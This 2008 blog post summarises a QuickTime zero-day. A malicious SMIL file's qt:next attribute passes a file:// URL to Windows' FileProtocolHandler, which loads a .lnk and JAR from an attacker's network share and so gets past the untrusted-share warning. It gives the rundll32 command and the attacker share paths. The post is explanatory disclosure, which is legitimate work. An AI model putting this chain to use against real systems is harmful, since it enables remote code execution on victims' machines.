Monday, September 15, 2008

Zero-Day for QuickTime Round Up

Here I tried summarized the 0-day vulnerability for Quicktime found recently at GNUCitizen. The bug is simple and can lead to command execution.

The attack vectors for this bug is the access to malicious NetBIOS share is not filtered. So hypothetically all the applications which sends user-supplied file:// protocol URLs to FileProtocolHandler is vulnerable to the same attack.

rundll32 url.dll,FileProtocolHandler URL

QuickTime SMIL file, hosted at a malicious site, is the begin of the story. An attribute, called qt:next, within the SMIL file will instruct the QuickTime player to play the next mp3 file. This attribute can point to protocol handler such as http:// or file://

If the following URL is passed to the FileProtocolHandler using the attribute above:

file://172.16.3.124/evil/evil.lnk

And the content of the evil.lnk is point to the following JAR file:

\\172.16.3.124\evil\evil.jar

Then it will bypass the following Windows protection and cause Java interpreter to execute the mailious JAR archive.
  • XP SP1 and above will warn user that an application is launched from an untrusted share.
  • This applies to all the executable extensions such as exe, .bat, .cmd, .vbs, .js, .application and other known executable file formats.
However, it seems that Windows protetion has exclude the JAR archive, which will parsed by Java interpreter. It will happily load the file and attack the victim’s system.

References: